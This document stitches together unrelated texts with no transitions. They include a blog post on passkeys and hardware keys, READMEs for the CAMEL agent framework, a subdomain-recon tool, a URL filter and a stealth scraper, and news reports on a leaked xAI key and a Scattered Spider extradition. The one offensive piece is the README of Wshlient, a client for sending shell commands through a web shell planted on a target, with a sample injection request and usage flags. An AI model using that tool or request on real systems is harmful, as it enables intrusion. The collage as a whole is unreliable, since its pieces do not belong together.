Let's jump into it and create that passkey, but just before we do, keep in mind that it's up to each and every different service to decide how they implement the workflow for creating passkeys. Just like how different services have different rules for password strength criteria, the same applies to the mechanics of passkey creation. LinkedIn begins by requiring my password again:
This is part of the verification process to ensure someone other than you (for example, someone who can sit down at your machine that's already logged into LinkedIn) can't add a new way of accessing your account. I'm then prompted for a 6-digit code:
Which has already been sent to my email address, thus verifying I am indeed the legitimate account holder:
As soon as I enter that code in the website, LinkedIn pushes the passkey to me, which 1Password then offers to save:
Again, your experience will differ based on which device and preferred method of storing passkeys you're using. But what will always be the same for LinkedIn is that you can then see the successfully created passkey on the website:
Now, let's see how it works by logging out of LinkedIn and then returning to the login page. Immediately, 1Password pops up and offers to sign me in with my passkey:
That's a one-click sign-in, and clicking the purple button immediately grants me access to my account. Not only will 1Password refuse to enter the passkey into a phishing site but, due to the technical implementation of the keys, it would be completely unusable even if it were submitted to a nefarious party. Let me emphasise something really significant about this process:
Passkeys are one of the few security constructs that make your life easier, rather than harder.
However, there's a problem: I still have a password on the account, and I can still log in with it. What this means is that LinkedIn has decided (and, again, this is one of those website-specific decisions), that a passkey merely represents a parallel means of logging in. It doesn't replace the password, nor can it be used as a second factor. Even after generating the passkey, only two options are available for that second factor:
The risk here is that you can still be tricked into entering your password into a phishing site, and per my Mailchimp example, your second factor (the OTP generated by your authenticator app) can then also be phished. This is not to say you shouldn't use a passkey on LinkedIn, but whilst you still have a password and phishable 2FA, you're still at risk of the same sort of attack that got me.
Let's try one more example, and this time, it's one that implements passkeys as a genuine second factor: Ubiquiti.
Ubiquiti is my favourite manufacturer of networking equipment, and logging onto their system gives you an enormous amount of visibility into my home network. When originally setting up that account many years ago, I enabled 2FA with an OTP and, as you now understand, ran the risk of it being phished. But just the other day I noticed passkey support and a few minutes later, my Ubiquiti account in 1Password looked like this:
I won't bother running through the setup process again because it's largely similar to WhatsApp and LinkedIn, but I will share just what it looks like to now login to that account, and it's awesome:
I intentionally left this running at real-time speed to show how fast the login process is with a password manager and passkey (I've blanked out some fields with personal info in them). That's about seven seconds from when I first interacted with the screen to when I was fully logged in with a strong password and second factor. Let me break that process down step by step:
Now, remember "the LinkedIn problem" where you were still stuck with phishable 2FA? Not so with Ubiquiti, who allowed me to completely delete the authenticator app:
But there's one more thing we can do here to strengthen everything up further, and that's to get rid of email authentication and replace it with something even stronger than a passkey: a U2F key.
Whilst passkeys themselves are considered non-phishable, what happens if the place you store that digital key gets compromised? Your iCloud Keychain, for example, or your 1Password account. If you configure and manage these services properly then the likelihood of that happening is extremely remote, but the possibility remains. Let's add something entirely different now, and that's a physical security key:
This is a YubiKey, and you can store your digital passkey on it. It needs to be purchased and as of today, that's about a US$60 investment for a single key. YubiKeys are "Universal 2 Factor" or U2F keys, and the one above (that's a 5C NFC) can either plug into a device with USB-C or be held next to a phone with NFC (that's "near field communication", a short-range wireless technology that requires devices to be a few centimetres apart). YubiKeys aren't the only U2F keys out there, but the name has become synonymous with the technology.
Back to Ubiquiti, and when I attempt to remove email authentication, the following prompt stops me dead in my tracks:
I don't want email authentication because that involves sending a code to my email address and, well, we all know what happens when we're relying on people to enter codes into login forms 🤔 So, let's now walk through the Ubiquiti process and add another passkey as a second factor:
But this time, when Chrome pops up and offers to save it in 1Password, I'm going to choose the little USB icon at the top of the prompt instead:
Windows then gives me a prompt to choose where I wish to save the passkey, which is where I choose the security key I've already inserted into my PC:
Each time you begin interacting with a U2F key, it requires a little tap:
And a moment later, my digital passkey has been saved to my physical U2F key:
Just as you can save your passkey to Apple's iCloud Keychain or in 1Password and sync it across your devices, you can also save it to a physical key. And that's precisely what I've now done - saved one Ubiquiti passkey to 1Password and one to my YubiKey. Which means I can now go and remove email authentication, but it does carry a risk:
This is a good point to reflect on the paradox that securing your digital life presents: as we seek stronger forms of authentication, we create different risks. Losing all your forms of non-phishable 2FA, for example, creates the risk of losing access to your account. But we also have mitigating controls: your digital passkey is managed totally independently of your physical one so the chances of losing both are extremely low. Plus, best practice is usually to have two U2F keys and enrol them both (I always take one with me when I travel, and leave another one at home). New levels of security, new risks, new mitigations.
All that's great, but beyond my examples above, who actually supports passkeys?! A rapidly expanding number of services, many of which 1Password has documented in their excellent passkeys.directory website:
Have a look through the list there, and you'll see many very familiar brands. You won't see Ubiquiti as of the time of writing, but I've gone through the "Suggest new listing" process to have them added and will be chatting further with the 1Password folks to see how we can more rapidly populate that list.
Do also take a look at the "Vote for passkeys support" tab and if you see a brand that really should be there, make your voice heard. Hey, here's a good one to start voting for:
I've deliberately just focused on the mechanics of passkeys in this blog post, but let me take just a moment to highlight important separate but related concepts. Think of passkeys as one part of what we call "defence in depth", that is the application of multiple controls to help keep you safe online. For example, you should still treat emails containing links with a healthy suspicion and whenever in doubt, not click anything and independently navigate to the website in question via your browser. You should still have strong, unique passwords and use a password manager to store them. And you should probably also make sure you're fully awake and not jet lagged in bed before manually entering your credentials into a website your password manager didn't autofill for you 🙂
We're not at the very beginning of passkeys, and we're also not yet quite at the tipping point either... but it's within sight. Just last week, Microsoft announced that new accounts will be passwordless by default, with a preference to using passkeys. Whilst passkeys are by no means perfect, look at what they're replacing! Start using them now on your most essential services and push those that don't support them to genuinely take the security of their customers seriously.
🐫 CAMEL is an open-source community dedicated to finding the scaling laws of agents. We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks. To facilitate research in this field, we implement and support various types of agents, tasks, prompts, models, and simulated environments.
The framework is designed to support systems with millions of agents, ensuring efficient coordination, communication, and resource management at scale.
Agents maintain stateful memory, enabling them to perform multi-step interactions with environments and efficiently tackle sophisticated tasks.
Every line of code and comment serves as a prompt for agents. Code should be written clearly and readably, ensuring both humans and agents can interpret it effectively.
We are a community-driven research collective comprising over 100 researchers dedicated to advancing frontier research in Multi-Agent Systems. Researchers worldwide choose CAMEL for their studies based on the following reasons.
Feature | Description |
---|---|
✅ Large-Scale Agent System | Simulate up to 1M agents to study emergent behaviors and scaling laws in complex, multi-agent environments. |
✅ Dynamic Communication | Enable real-time interactions among agents, fostering seamless collaboration for tackling intricate tasks. |
✅ Stateful Memory | Equip agents with the ability to retain and leverage historical context, improving decision-making over extended interactions. |
✅ Support for Multiple Benchmarks | Utilize standardized benchmarks to rigorously evaluate agent performance, ensuring reproducibility and reliable comparisons. |
✅ Support for Different Agent Types | Work with a variety of agent roles, tasks, models, and environments, supporting interdisciplinary experiments and diverse research applications. |
✅ Data Generation and Tool Integration | Automate the creation of large-scale, structured datasets while seamlessly integrating with multiple tools, streamlining synthetic data generation and research workflows. |
Installing CAMEL is a breeze thanks to its availability on PyPI. Simply open your terminal and run:
pip install camel-ai
This example demonstrates how to create a ChatAgent using the CAMEL framework and perform a search query using DuckDuckGo.
pip install 'camel-ai[web_tools]'
export OPENAI_API_KEY='your_openai_api_key'
```python
from camel.models import ModelFactory
from camel.types import ModelPlatformType, ModelType
from camel.agents import ChatAgent
from camel.toolkits import SearchToolkit

model = ModelFactory.create(
    model_platform=ModelPlatformType.OPENAI,
    model_type=ModelType.GPT_4O,
    model_config_dict={"temperature": 0.0},
)

search_tool = SearchToolkit().search_duckduckgo

agent = ChatAgent(model=model, tools=[search_tool])

response_1 = agent.step("What is CAMEL-AI?")
print(response_1.msgs[0].content)
# CAMEL-AI is the first LLM (Large Language Model) multi-agent framework
# and an open-source community focused on finding the scaling laws of agents.
# ...

response_2 = agent.step("What is the Github link to CAMEL framework?")
print(response_2.msgs[0].content)
# The GitHub link to the CAMEL framework is
# https://github.com/camel-ai/camel.
```
For more detailed instructions and additional configuration options, check out the installation section.
After running, you can explore our CAMEL Tech Stack and Cookbooks at docs.camel-ai.org to build powerful multi-agent systems.
We provide a demo showcasing a conversation between two ChatGPT agents playing the roles of a Python programmer and a stock trader collaborating on developing a trading bot for the stock market.
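If you'd like to try something similar yourself, here's a rough sketch using CAMEL's RolePlaying society; exact argument names and response structures may vary between versions, so treat it as a starting point rather than a definitive recipe:

```python
from camel.societies import RolePlaying

# A two-agent society: an assistant and a user collaborating on one task
session = RolePlaying(
    assistant_role_name="Python Programmer",
    user_role_name="Stock Trader",
    task_prompt="Develop a trading bot for the stock market",
)

# Kick off the conversation and run a few turns
input_msg = session.init_chat()
for _ in range(3):
    assistant_response, user_response = session.step(input_msg)
    if assistant_response.terminated or user_response.terminated:
        break
    print(assistant_response.msg.content)
    input_msg = assistant_response.msg  # feed the assistant's reply back in
```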
Explore different types of agents, their roles, and their applications.
Please reach out to us on the CAMEL Discord if you encounter any issues setting up CAMEL.
Core components and utilities to build, operate, and enhance CAMEL-AI agents and societies.
Module | Description |
---|---|
Agents | Core agent architectures and behaviors for autonomous operation. |
Agent Societies | Components for building and managing multi-agent systems and collaboration. |
Data Generation | Tools and methods for synthetic data creation and augmentation. |
Models | Model architectures and customization options for agent intelligence. |
Tools | Tools integration for specialized agent tasks. |
Memory | Memory storage and retrieval mechanisms for agent state management. |
Storage | Persistent storage solutions for agent data and states. |
Benchmarks | Performance evaluation and testing frameworks. |
Interpreters | Code and command interpretation capabilities. |
Data Loaders | Data ingestion and preprocessing tools. |
Retrievers | Knowledge retrieval and RAG components. |
Runtime | Execution environment and process management. |
Human-in-the-Loop | Interactive components for human oversight and intervention. |
Explore our research projects:
Research with Us
We warmly invite you to use CAMEL for your impactful research.
Rigorous research takes time and resources. We are a community-driven research collective with 100+ researchers exploring the frontier research of Multi-agent Systems. Join our ongoing projects or test new ideas with us, reach out via email for more information.
![]()
For more details, please see our Models Documentation.
Data (Hosted on Hugging Face)
Dataset | Chat format | Instruction format | Chat format (translated) |
---|---|---|---|
AI Society | Chat format | Instruction format | Chat format (translated) |
Code | Chat format | Instruction format | x |
Math | Chat format | x | x |
Physics | Chat format | x | x |
Chemistry | Chat format | x | x |
Biology | Chat format | x | x |
Dataset | Instructions | Tasks |
---|---|---|
AI Society | Instructions | Tasks |
Code | Instructions | Tasks |
Misalignment | Instructions | Tasks |
Practical guides and tutorials for implementing specific functionalities in CAMEL-AI agents and societies.
Cookbook | Description |
---|---|
Creating Your First Agent | A step-by-step guide to building your first agent. |
Creating Your First Agent Society | Learn to build a collaborative society of agents. |
Message Cookbook | Best practices for message handling in agents. |
Cookbook | Description |
---|---|
Tools Cookbook | Integrating tools for enhanced functionality. |
Memory Cookbook | Implementing memory systems in agents. |
RAG Cookbook | Recipes for Retrieval-Augmented Generation. |
Graph RAG Cookbook | Leveraging knowledge graphs with RAG. |
Track CAMEL Agents with AgentOps | Tools for tracking and managing agents in operations. |
Cookbook | Description |
---|---|
Data Generation with CAMEL and Finetuning with Unsloth | Learn how to generate data with CAMEL and fine-tune models effectively with Unsloth. |
Data Gen with Real Function Calls and Hermes Format | Explore how to generate data with real function calls and the Hermes format. |
CoT Data Generation and Upload Data to Huggingface | Uncover how to generate CoT data with CAMEL and seamlessly upload it to Huggingface. |
CoT Data Generation and SFT Qwen with Unsloth | Discover how to generate CoT data using CAMEL and SFT Qwen with Unsloth, and seamlessly upload your data and model to Huggingface. |
Cookbook | Description |
---|---|
Role-Playing Scraper for Report & Knowledge Graph Generation | Create role-playing agents for data scraping and reporting. |
Create A Hackathon Judge Committee with Workforce | Building a team of agents for collaborative judging. |
Dynamic Knowledge Graph Role-Playing: Multi-Agent System with dynamic, temporally-aware knowledge graphs | Builds dynamic, temporally-aware knowledge graphs for financial applications using a multi-agent system. It processes financial reports, news articles, and research papers to help traders analyze data, identify relationships, and uncover market insights. The system also utilizes diverse and optional element node deduplication techniques to ensure data integrity and optimize graph structure for financial decision-making. |
Customer Service Discord Bot with Agentic RAG | Learn how to build a robust customer service bot for Discord using Agentic RAG. |
Customer Service Discord Bot with Local Model | Learn how to build a robust customer service bot for Discord using Agentic RAG which supports local deployment. |
Cookbook | Description |
---|---|
Video Analysis | Techniques for agents in video data analysis. |
3 Ways to Ingest Data from Websites with Firecrawl | Explore three methods for extracting and processing data from websites using Firecrawl. |
Create AI Agents that work with your PDFs | Learn how to create AI agents that work with your PDFs using Chunkr and Mistral AI. |
For those who'd like to contribute code, we appreciate your interest in contributing to our open-source initiative. Please take a moment to review our contributing guidelines to get started on a smooth collaboration journey.🚀
We also welcome you to help CAMEL grow by sharing it on social media, at events, or during conferences. Your support makes a big difference!
For more information please contact camel-ai@eigent.ai
GitHub Issues: Report bugs, request features, and track development. Submit an issue
Discord: Get real-time support, chat with the community, and stay updated. Join us
X (Twitter): Follow for updates, AI insights, and key announcements. Follow us
Ambassador Project: Advocate for CAMEL-AI, host events, and contribute content. Learn more
@inproceedings{li2023camel,
title={CAMEL: Communicative Agents for "Mind" Exploration of Large Language Model Society},
author={Li, Guohao and Hammoud, Hasan Abed Al Kader and Itani, Hani and Khizbullin, Dmitrii and Ghanem, Bernard},
booktitle={Thirty-seventh Conference on Neural Information Processing Systems},
year={2023}
}
Special thanks to Nomic AI for giving us extended access to their data set exploration tool (Atlas).
We would also like to thank Haya Hammoud for designing the initial logo of our project.
We implemented amazing research ideas from other works for you to build, compare and customize your agents. If you use any of these modules, please kindly cite the original works:

- TaskCreationAgent, TaskPrioritizationAgent and BabyAGI from Nakajima et al.: Task-Driven Autonomous Agent. [Example]
- PersonaHub from Tao Ge et al.: Scaling Synthetic Data Creation with 1,000,000,000 Personas. [Example]
- Self-Instruct from Yizhong Wang et al.: SELF-INSTRUCT: Aligning Language Models with Self-Generated Instructions. [Example]
The source code is licensed under Apache 2.0.
Website • Documentation • Roadmap
Liam ERD generates beautiful, interactive ER diagrams from your database. Whether you're working on public or private repositories, Liam ERD helps you visualize complex schemas with ease.
Insert liambx.com/erd/p/ into your schema file's URL:
# Original: https://github.com/user/repo/blob/master/db/schema.rb
# Modified: https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb
👾^^^^^^^^^^^^^^^^👾
Run the interactive setup:
npx @liam-hq/cli init
If you find this project helpful, please give it a star! ⭐
Your support helps us reach a wider audience and continue development.
Check out the full documentation on the website.
See what we're working on and what's coming next on our roadmap.
SubGPT looks at subdomains you have already discovered for a domain and uses BingGPT to find more. Best part? It's free!
The following subdomains were found by this tool with these 30 subdomains as input.
call-prompts-staging.example.com
dclb02-dca1.prod.example.com
activedirectory-sjc1.example.com
iadm-staging.example.com
elevatenetwork-c.example.com
If you like my work, you can support me with as little as $1, here :)
pip install subgpt
git clone https://github.com/s0md3v/SubGPT && cd SubGPT && python setup.py install
SubGPT needs your Bing cookies to talk to BingGPT; export them to a cookies.json file and pass its path with the -c option.
Note: Any issues regarding BingGPT itself should be reported to EdgeGPT, not here.
It is supposed to be used after you have discovered some subdomains using all other methods. The standard way to run SubGPT is as follows:
subgpt -i input.txt -o output.txt -c /path/to/cookies.json
If you don't specify an output file, the output will be shown in your terminal (stdout) instead.
To generate subdomains and not resolve them, use the --dont-resolve option. It's a great way to see all subdomains generated by SubGPT and/or use your own resolver on them.
An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.
Image: Shutterstock, @sdx15.
Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.
Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.
GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.
“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”
Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.
“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”
xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.
Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.
“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could use it for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”
The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.
The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.
“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.
Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.
A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.
Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.
“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”
I love a good road trip. Always have, but particularly during COVID when international options were somewhat limited, one road trip ended up, well, "extensive". I also love the recent trips Charlotte and I have taken to spend time with many of the great agencies we've worked with over the years, including the FBI, CISA, CCCS, RCMP, NCA, NCSC UK and NCSC Ireland. So, that's what we're going to do next month across some very cool locations in Europe:
Whilst the route isn't set in stone, we'll start out in Germany and cover Liechtenstein, Switzerland, France, Italy and Austria. We have existing relationships with folks in all but one of those locations (France, call me!) and hope to do some public events as we recently have at Oxford University, Reykjavik and even Perth back on (almost) this side of the world. And that's the reason for writing this post today: if you're in proximity of this route and would like to organise an event or if you're a partner I haven't already reached out to, please get in touch. We usually manage to line up a healthy collection of events and assuming we can do that again on this trip, I'll publish them to the events page shortly. There's also a little bit of availability in Dubai on the way over we'll put to productive use, so definitely reach out if you're over that way.
If you're in another part of the world that needs a visit with a handful of HIBP swag, let me know, there's a bunch of other locations on the short list, and we're always thinking about what's coming next 🌍
Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
It doesn't make any HTTP requests to the URLs and removes:

- incremental urls e.g. /page/1/ and /page/2/
- blog posts and similar human written content e.g. /posts/a-brief-history-of-time
- urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2
- images, js, css and other "useless" files
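To illustrate the idea behind one of those rules (this is not uro's actual implementation, just a minimal sketch), deduplicating URLs that differ only in their parameter values could look roughly like this:

```python
from urllib.parse import urlsplit, parse_qsl

def dedupe(urls):
    """Keep one URL per (host, path, sorted parameter names) combination."""
    seen, kept = set(), []
    for url in urls:
        parts = urlsplit(url)
        # Parameter *names* form the key; their values are ignored
        params = tuple(sorted(k for k, _ in parse_qsl(parts.query)))
        key = (parts.netloc, parts.path, params)
        if key not in seen:
            seen.add(key)
            kept.append(url)
    return kept

print(dedupe([
    "http://example.com/page.php?id=1",
    "http://example.com/page.php?id=2",  # dropped: same path and parameter names
]))
```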
The recommended way to install uro is as follows:
pipx install uro
Note: If you are using an older version of python, use pip instead of pipx
The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.
cat urls.txt | uro
uro -i input.txt
When writing to an output file: if the file already exists, uro will not overwrite the contents; otherwise, it will create a new file.
uro -i input.txt -o output.txt
Whitelist (-w/--whitelist): uro will ignore all other extensions except the ones provided.

uro -w php asp html
Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.
Blacklist (-b/--blacklist): uro will ignore the given extensions.

uro -b jpg png js pdf
Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through the blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.
For granular control, uro supports the following filters:

- hasparams: only keep URLs that have query parameters e.g. http://example.com/page.php?id=
- noparams: only keep URLs without query parameters e.g. http://example.com/page.php
- hasext: only keep URLs that have an extension e.g. http://example.com/page.php
- noext: only keep URLs without an extension e.g. http://example.com/page
- allexts: don't remove URLs based on extension e.g. keep .jpg which would be removed otherwise
- keepslash: don't remove the trailing slash from URLs e.g. http://example.com/page/
Example: uro --filters hasexts hasparams
A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.
Scattered Spider is a loosely affiliated criminal hacking group whose members have broken into and stolen data from some of the world’s largest technology companies. Buchanan was arrested in Spain last year on a warrant from the FBI, which wanted him in connection with a series of SMS-based phishing attacks in the summer of 2022 that led to intrusions at Twilio, LastPass, DoorDash, Mailchimp, and many other tech firms.
Tyler Buchanan, being escorted by Spanish police at the airport in Palma de Mallorca in June 2024.
As first reported by KrebsOnSecurity, Buchanan (a.k.a. “tylerb”) fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. Buchanan was arrested in June 2024 at the airport in Palma de Mallorca while trying to board a flight to Italy. His extradition to the United States was first reported last week by Bloomberg.
Members of Scattered Spider have been tied to the 2023 ransomware attacks against MGM and Caesars casinos in Las Vegas, but it remains unclear whether Buchanan was implicated in that incident. The Justice Department’s complaint against Buchanan makes no mention of the 2023 ransomware attack.
Rather, the investigation into Buchanan appears to center on the SMS phishing campaigns from 2022, and on SIM-swapping attacks that siphoned funds from individual cryptocurrency investors. In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — including one-time passcodes for authentication and password reset links sent via SMS.
In August 2022, KrebsOnSecurity reviewed data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB called them by a different name — 0ktapus, because the group typically spoofed the identity provider Okta in their phishing messages to employees at targeted firms.
A Scattered Spider/0Ktapus SMS phishing lure sent to Twilio employees in 2022.
The complaint against Buchanan (PDF) says the FBI tied him to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous Okta-themed phishing domains seen in the campaign. The domain registrar NameCheap found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan from January 26, 2022 to November 7, 2022.
Authorities seized at least 20 digital devices when they raided Buchanan’s residence, and on one of those devices they found usernames and passwords for employees of three different companies targeted in the phishing campaign.
“The FBI’s investigation to date has gathered evidence showing that Buchanan and his co-conspirators targeted at least 45 companies in the United States and abroad, including Canada, India, and the United Kingdom,” the FBI complaint reads. “One of Buchanan’s devices contained a screenshot of Telegram messages between an account known to be used by Buchanan and other unidentified co-conspirators discussing dividing up the proceeds of SIM swapping.”
U.S. prosecutors allege that records obtained from Discord showed the same U.K. Internet address was used to operate a Discord account that specified a cryptocurrency wallet when asking another user to send funds. The complaint says the publicly available transaction history for that payment address shows approximately 391 bitcoin was transferred in and out of this address between October 2022 and February 2023; 391 bitcoin is presently worth more than $26 million.
In November 2024, federal prosecutors in Los Angeles unsealed criminal charges against Buchanan and four other alleged Scattered Spider members, including Ahmed Elbadawy, 23, of College Station, Texas; Joel Evans, 25, of Jacksonville, North Carolina; Evans Osiebo, 20, of Dallas; and Noah Urban, 20, of Palm Coast, Florida. KrebsOnSecurity reported last year that another suspected Scattered Spider member — a 17-year-old from the United Kingdom — was arrested as part of a joint investigation with the FBI into the MGM hack.
Mr. Buchanan’s court-appointed attorney did not respond to a request for comment. The accused faces charges of wire fraud conspiracy, conspiracy to obtain information by computer for private financial gain, and aggravated identity theft. Convictions on the latter charge carry a minimum sentence of two years in prison.
Documents from the U.S. District Court for the Central District of California indicate Buchanan is being held without bail pending trial. A preliminary hearing in the case is slated for May 6.
Today, we're happy to welcome the Gambia National CSIRT to Have I Been Pwned as the 38th government to be onboarded with full and free access to their government domains. We've been offering this service for seven years now, and it enables national CSIRTs to gain greater visibility into the impact of data breaches on their respective nations.
Our goal at HIBP remains very straightforward: to do good things with data breaches after bad things happen. We hope this initiative helps support the Gambia National CSIRT as it has with many other governments around the world.
Web Shell Client

Wshlient is a web shell client designed to be pretty simple yet versatile. You just need to create a text file containing an HTTP request and tell Wshlient where to inject the commands, then you can enjoy a shell.
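For illustration only (this example isn't taken from the project's docs), such a request file might look like the one below, where the default INJECT token marks where Wshlient substitutes your commands; the host and path are hypothetical:

GET /uploads/shell.php?cmd=INJECT HTTP/1.1
Host: target.example.com
User-Agent: Mozilla/5.0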
In case the above video does not work for you:
Beyond Python's included batteries, Wshlient only uses requests. Just install it directly or via requirements.txt:
$ git clone https://github.com/gildasio/wshlient
$ cd wshlient
$ pip install -r requirements.txt
$ ./wshlient.py -h
Alternatively you can also create a symbolic link in your $PATH
to use it directly anywhere in the system:
$ ln -s $PWD/wshlient.py /usr/local/bin/wshlient
$ ./wshlient.py -h
usage: wshlient.py [-h] [-d] [-i] [-ne] [-it INJECTION_TOKEN] [-st START_TOKEN] [-et END_TOKEN] req
positional arguments:
req File containing raw http request
options:
-h, --help show this help message and exit
-d, --debug Enable debug output
-i, --ifs Replaces whitespaces with $IFS
-ne, --no-url-encode Disable command URL encode
-it INJECTION_TOKEN, --injection-token INJECTION_TOKEN
Token to be replaced by commands (default: INJECT)
-st START_TOKEN, --start-token START_TOKEN
Token that marks the output beginning
-et END_TOKEN, --end-token END_TOKEN
Token that marks the output ending
You can contribute to Wshlient by opening issues and sending pull requests. Feel free to do so, but keep in mind to keep it simple.
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.
Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!
- Fetch pages with the Fetcher class.
- Fetch pages with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
- Async support for the StealthyFetcher and PlayWrightFetcher classes.

from scrapling.fetchers import Fetcher
fetcher = Fetcher(auto_match=False)
# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))
# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above
# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]
# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...
# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)
To keep it simple, all methods can be chained on top of each other!
Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.
# | Library | Time (ms) | vs Scrapling |
---|---|---|---|
1 | Scrapling | 5.44 | 1.0x |
2 | Parsel/Scrapy | 5.53 | 1.017x |
3 | Raw Lxml | 6.76 | 1.243x |
4 | PyQuery | 21.96 | 4.037x |
5 | Selectolax | 67.12 | 12.338x |
6 | BS4 with Lxml | 1307.03 | 240.263x |
7 | MechanicalSoup | 1322.64 | 243.132x |
8 | BS4 with html5lib | 3373.75 | 620.175x |
As you see, Scrapling is on par with Scrapy and slightly faster than Lxml, the library both of them are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml, but Scrapling is still 4 times faster.
Library | Time (ms) | vs Scrapling |
---|---|---|
Scrapling | 2.51 | 1.0x |
AutoScraper | 11.41 | 4.546x |
Scrapling can find elements with more methods and returns full element Adaptor objects, not just the text like AutoScraper does. So, to make this test fair, both libraries extract an element by text, find similar elements, and then extract the text content of all of them. As you see, Scrapling is still 4.5 times faster at the same task.
